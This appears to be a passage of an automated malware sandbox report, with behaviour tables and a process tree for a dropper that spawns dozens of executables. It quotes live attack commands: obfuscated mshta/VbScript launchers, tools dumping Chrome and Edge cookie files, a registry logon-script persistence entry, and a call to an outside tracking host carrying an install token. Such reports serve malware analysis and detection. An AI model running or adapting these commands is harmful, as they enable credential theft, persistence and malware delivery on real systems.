| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N8276.tmp\WEATHER Manager.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N8276.tmp\WEATHER Manager.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\4689318.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\0AYyRtztyqrbI93baqYQFzAF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\_9x9uZ9VZbumvRyESvdNDHkK.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\1610538.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\BHjXhj_tjZzHuE3CfkTYhf1c.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\6269809.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\XczKdLIjFYQVytac2MjDNll1.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\4402357.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9P408.tmp\3wpzV7LHpsW8SeHdznOlDVhr.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-5JDP6.tmp\Inlog.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-CEN4J.tmp\VPN.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4902K.tmp\Setup.exe | N/A |
| N/A | N/A | C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv luym4IzXO0urCuKpt8jgJQ.0.2
C:\Users\Admin\Documents\JxpkWClkJbM2fYm7OhyaUb6t.exe
"C:\Users\Admin\Documents\JxpkWClkJbM2fYm7OhyaUb6t.exe"
C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe
"C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe"
C:\Users\Admin\Documents\j62NJTQboyYOvarl8jrAa8lQ.exe
"C:\Users\Admin\Documents\j62NJTQboyYOvarl8jrAa8lQ.exe"
C:\Users\Admin\Documents\yw0ARrSPlqSyuceX0tjgIibn.exe
"C:\Users\Admin\Documents\yw0ARrSPlqSyuceX0tjgIibn.exe"
C:\Users\Admin\Documents\0AYyRtztyqrbI93baqYQFzAF.exe
"C:\Users\Admin\Documents\0AYyRtztyqrbI93baqYQFzAF.exe"
C:\Users\Admin\Documents\_9x9uZ9VZbumvRyESvdNDHkK.exe
"C:\Users\Admin\Documents\_9x9uZ9VZbumvRyESvdNDHkK.exe"
C:\Users\Admin\Documents\zXSa7l7MEIxshkxZELsqXAEU.exe
"C:\Users\Admin\Documents\zXSa7l7MEIxshkxZELsqXAEU.exe"
C:\Users\Admin\Documents\BHjXhj_tjZzHuE3CfkTYhf1c.exe
"C:\Users\Admin\Documents\BHjXhj_tjZzHuE3CfkTYhf1c.exe"
C:\Users\Admin\Documents\XczKdLIjFYQVytac2MjDNll1.exe
"C:\Users\Admin\Documents\XczKdLIjFYQVytac2MjDNll1.exe"
C:\Users\Admin\Documents\dJOhK8qbsoDBcSld8pMhMjWQ.exe
"C:\Users\Admin\Documents\dJOhK8qbsoDBcSld8pMhMjWQ.exe"
C:\Users\Admin\Documents\aeRdKRut5ZCEjYsLcmXpklIj.exe
"C:\Users\Admin\Documents\aeRdKRut5ZCEjYsLcmXpklIj.exe"
C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe
"C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe"
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
"C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe"
C:\Users\Admin\Documents\9pfZd5qZRhGCooZrVYX90C1h.exe
"C:\Users\Admin\Documents\9pfZd5qZRhGCooZrVYX90C1h.exe"
C:\Users\Admin\Documents\3wpzV7LHpsW8SeHdznOlDVhr.exe
"C:\Users\Admin\Documents\3wpzV7LHpsW8SeHdznOlDVhr.exe"
C:\Users\Admin\AppData\Local\Temp\is-9P408.tmp\3wpzV7LHpsW8SeHdznOlDVhr.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9P408.tmp\3wpzV7LHpsW8SeHdznOlDVhr.tmp" /SL5="$7020A,138429,56832,C:\Users\Admin\Documents\3wpzV7LHpsW8SeHdznOlDVhr.exe"
C:\Users\Admin\Documents\j62NJTQboyYOvarl8jrAa8lQ.exe
C:\Users\Admin\Documents\j62NJTQboyYOvarl8jrAa8lQ.exe
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
C:\Users\Admin\Documents\aeRdKRut5ZCEjYsLcmXpklIj.exe
"C:\Users\Admin\Documents\aeRdKRut5ZCEjYsLcmXpklIj.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 400 -ip 400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1640 -ip 1640
C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe
"C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1456 -ip 1456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4952 -ip 4952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 316
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
C:\Users\Admin\AppData\Roaming\1610538.exe
"C:\Users\Admin\AppData\Roaming\1610538.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 292
C:\Users\Admin\AppData\Roaming\4402357.exe
"C:\Users\Admin\AppData\Roaming\4402357.exe"
C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe
"C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3324 -ip 3324
C:\Users\Admin\AppData\Roaming\6714308.exe
"C:\Users\Admin\AppData\Roaming\6714308.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 312
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Users\Admin\Documents\36H0x_pEZxGQ648xkMBepoMB.exe
"C:\Users\Admin\Documents\36H0x_pEZxGQ648xkMBepoMB.exe"
C:\Users\Admin\Documents\_mOR0RAfOsExG638NCtHjm6B.exe
"C:\Users\Admin\Documents\_mOR0RAfOsExG638NCtHjm6B.exe"
C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe
"C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe"
C:\Users\Admin\Documents\qV5dvKCOf3jbI4p4wHoY7HtS.exe
"C:\Users\Admin\Documents\qV5dvKCOf3jbI4p4wHoY7HtS.exe"
C:\Users\Admin\AppData\Roaming\6269809.exe
"C:\Users\Admin\AppData\Roaming\6269809.exe"
C:\Users\Admin\Documents\RZD4oho8I4zDqCNSUS5wG0QB.exe
"C:\Users\Admin\Documents\RZD4oho8I4zDqCNSUS5wG0QB.exe"
C:\Users\Admin\Documents\3vLa7ArANMnSow_dFvTpjPtT.exe
"C:\Users\Admin\Documents\3vLa7ArANMnSow_dFvTpjPtT.exe"
C:\Users\Admin\Documents\eLCkNwHAgOHnUjHUl5w4wbkB.exe
"C:\Users\Admin\Documents\eLCkNwHAgOHnUjHUl5w4wbkB.exe"
C:\Users\Admin\Documents\FlfGkKyliXtbVPnQShveCOZZ.exe
"C:\Users\Admin\Documents\FlfGkKyliXtbVPnQShveCOZZ.exe"
C:\Users\Admin\Documents\oYP9zRm_dNH8VgV3gPUOmB9X.exe
"C:\Users\Admin\Documents\oYP9zRm_dNH8VgV3gPUOmB9X.exe"
C:\Users\Admin\Documents\HgTUPdNwPn1o75ugfakeivdf.exe
"C:\Users\Admin\Documents\HgTUPdNwPn1o75ugfakeivdf.exe"
C:\Users\Admin\Documents\BldqCG2I5GdWcHEKQbCVyOfe.exe
"C:\Users\Admin\Documents\BldqCG2I5GdWcHEKQbCVyOfe.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1420 -ip 1420
C:\Users\Admin\Documents\gRrDvTVcNRgnOFqG3tJO9JHJ.exe
"C:\Users\Admin\Documents\gRrDvTVcNRgnOFqG3tJO9JHJ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 312
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Users\Admin\Documents\qV5dvKCOf3jbI4p4wHoY7HtS.exe
C:\Users\Admin\Documents\qV5dvKCOf3jbI4p4wHoY7HtS.exe
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4496 -ip 4496
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3060 -ip 3060
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe" ) do taskkill -f -iM "%~NxA"
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4476 -ip 4476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 236
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 296
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "jKLSPhadj6e2QQLlPuXVqGnE.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 8 -ip 8
C:\Users\Admin\AppData\Local\Temp\is-5JDP6.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5JDP6.tmp\Inlog.tmp" /SL5="$20376,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4676 -ip 4676
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 276
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5528 -ip 5528
C:\Users\Admin\AppData\Local\Temp\C583.exe
C:\Users\Admin\AppData\Local\Temp\C583.exe
C:\Users\Admin\AppData\Local\Temp\is-IKBKK.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-IKBKK.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-N8276.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N8276.tmp\WEATHER Manager.tmp" /SL5="$70282,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Users\Admin\AppData\Local\Temp\is-CEN4J.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CEN4J.tmp\VPN.tmp" /SL5="$60366,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp" /SL5="$302FC,17361482,721408,C:\Users\Admin\AppData\Local\Temp\is-IKBKK.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 296
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Users\Admin\AppData\Local\Temp\D14C.exe
C:\Users\Admin\AppData\Local\Temp\D14C.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-FI5TK.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FI5TK.tmp\MediaBurner2.tmp" /SL5="$1046C,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-QE5G6.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 1900 -ip 1900
C:\Users\Admin\AppData\Local\Temp\is-CGVL2.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-CGVL2.tmp\3377047_logo_media.exe" /S /UID=burnerch2
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1900 -s 2304
C:\Users\Admin\AppData\Local\Temp\E3DB.exe
C:\Users\Admin\AppData\Local\Temp\E3DB.exe
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-QE5G6.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Users\Admin\AppData\Roaming\2734919.exe
"C:\Users\Admin\AppData\Roaming\2734919.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1992 -ip 1992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1368 -ip 1368
C:\Users\Admin\AppData\Roaming\4689318.exe
"C:\Users\Admin\AppData\Roaming\4689318.exe"
C:\Users\Admin\AppData\Roaming\3520134.exe
"C:\Users\Admin\AppData\Roaming\3520134.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 296
C:\Users\Admin\AppData\Roaming\6643716.exe
"C:\Users\Admin\AppData\Roaming\6643716.exe"
C:\Users\Admin\AppData\Roaming\1627520.exe
"C:\Users\Admin\AppData\Roaming\1627520.exe"
C:\Users\Admin\AppData\Local\Temp\tmpE187_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpE187_tmp.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\176.exe
C:\Users\Admin\AppData\Local\Temp\176.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Local\Temp\is-4902K.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-4902K.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4696 -ip 4696
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Users\Admin\AppData\Local\Temp\is-QE5G6.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-QE5G6.tmp\{app}\vdi_compiler"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 1640
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
C:\Users\Admin\AppData\Local\Temp\272F.exe
C:\Users\Admin\AppData\Local\Temp\272F.exe
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Users\Admin\AppData\Local\Temp\is-V609D.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-V609D.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\AppData\Local\Temp\is-33RS1.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-33RS1.tmp\Setup.tmp" /SL5="$80282,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-V609D.tmp\Setup.exe" /silent /subid=720
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 5A2054B3043C973B0886FEF2CADA1042 C
C:\Windows\SysWOW64\findstr.exe
